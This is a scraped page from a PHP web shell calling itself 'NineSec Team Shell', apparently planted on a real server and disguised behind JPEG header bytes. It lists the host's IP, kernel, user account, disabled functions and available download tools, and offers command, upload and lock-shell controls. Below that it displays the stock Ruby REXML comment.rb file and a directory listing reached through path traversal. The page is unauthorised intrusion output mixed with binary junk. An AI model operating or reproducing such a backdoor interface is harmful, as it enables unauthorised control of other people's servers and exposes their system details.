�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/ldap/../etckeeper/../../usr/lib/ruby/2.7.0/singleton/../rexml/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/ldap/../etckeeper/../../usr/lib/ruby/2.7.0/singleton/../rexml/comment.rb
# frozen_string_literal: false
require_relative "child"

module REXML
  ##
  # Represents an XML comment; that is, text between \<!-- ... -->
  class Comment < Child
    include Comparable
    START = "<!--"
    STOP = "-->"

    # The content text

    attr_accessor :string

    ##
    # Constructor.  The first argument can be one of three types:
    # @param first If String, the contents of this comment are set to the
    # argument.  If Comment, the argument is duplicated.  If
    # Source, the argument is scanned for a comment.
    # @param second If the first argument is a Source, this argument
    # should be nil, not supplied, or a Parent to be set as the parent
    # of this object
    def initialize( first, second = nil )
      super(second)
      if first.kind_of? String
        @string = first
      elsif first.kind_of? Comment
        @string = first.string
      end
    end

    def clone
      Comment.new self
    end

    # == DEPRECATED
    # See REXML::Formatters
    #
    # output::
    #    Where to write the string
    # indent::
    #    An integer.    If -1, no indenting will be used; otherwise, the
    #    indentation will be this number of spaces, and children will be
    #    indented an additional amount.
    # transitive::
    #    Ignored by this class. The contents of comments are never modified.
    # ie_hack::
    #    Needed for conformity to the child API, but not used by this class.
    def write( output, indent=-1, transitive=false, ie_hack=false )
      Kernel.warn("Comment.write is deprecated.  See REXML::Formatters", uplevel: 1)
      indent( output, indent )
      output << START
      output << @string
      output << STOP
    end

    alias :to_s :string

    ##
    # Compares this Comment to another; the contents of the comment are used
    # in the comparison.
    def <=>(other)
      other.to_s <=> @string
    end

    ##
    # Compares this Comment to another; the contents of the comment are used
    # in the comparison.
    def ==( other )
      other.kind_of? Comment and
      (other <=> self) == 0
    end

    def node_type
      :comment
    end
  end
end
#vim:ts=2 sw=2 noexpandtab:

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
October 23 2023 6:29:37
root
0755
dtd
--
October 23 2023 6:29:37
root
0755
formatters
--
October 23 2023 6:29:37
root
0755
light
--
October 23 2023 6:29:37
root
0755
parsers
--
October 23 2023 6:29:37
root
0755
validation
--
October 23 2023 6:29:37
root
0755
attlistdecl.rb
1.924 KB
December 25 2019 10:50:58
root
0644
attribute.rb
5.974 KB
December 25 2019 10:50:58
root
0644
cdata.rb
1.586 KB
December 25 2019 10:50:58
root
0644
child.rb
2.661 KB
December 25 2019 10:50:58
root
0644
comment.rb
2.119 KB
December 25 2019 10:50:58
root
0644
doctype.rb
7.969 KB
July 06 2023 12:57:08
root
0644
document.rb
9.55 KB
December 25 2019 10:50:58
root
0644
element.rb
44.529 KB
December 25 2019 10:50:58
root
0644
encoding.rb
1.155 KB
December 25 2019 10:50:58
root
0644
entity.rb
5.401 KB
December 25 2019 10:50:58
root
0644
functions.rb
12.272 KB
December 25 2019 10:50:58
root
0644
instruction.rb
2.14 KB
December 25 2019 10:50:58
root
0644
namespace.rb
1.402 KB
December 25 2019 10:50:58
root
0644
node.rb
2.184 KB
December 25 2019 10:50:58
root
0644
output.rb
0.54 KB
December 25 2019 10:50:58
root
0644
parent.rb
4.272 KB
December 25 2019 10:50:58
root
0644
parseexception.rb
1.253 KB
December 25 2019 10:50:58
root
0644
quickpath.rb
9.122 KB
December 25 2019 10:50:58
root
0644
rexml.rb
1.286 KB
December 25 2019 10:50:58
root
0644
sax2listener.rb
3.606 KB
December 25 2019 10:50:58
root
0644
security.rb
0.805 KB
December 25 2019 10:50:58
root
0644
source.rb
7.716 KB
December 25 2019 10:50:58
root
0644
streamlistener.rb
3.84 KB
December 25 2019 10:50:58
root
0644
text.rb
13.879 KB
December 25 2019 10:50:58
root
0644
undefinednamespaceexception.rb
0.238 KB
December 25 2019 10:50:58
root
0644
xmldecl.rb
2.948 KB
December 25 2019 10:50:58
root
0644
xmltokens.rb
2.324 KB
December 25 2019 10:50:58
root
0644
xpath.rb
3.419 KB
December 25 2019 10:50:58
root
0644
xpath_parser.rb
29.635 KB
December 25 2019 10:50:58
root
0644

NineSec Team - 2022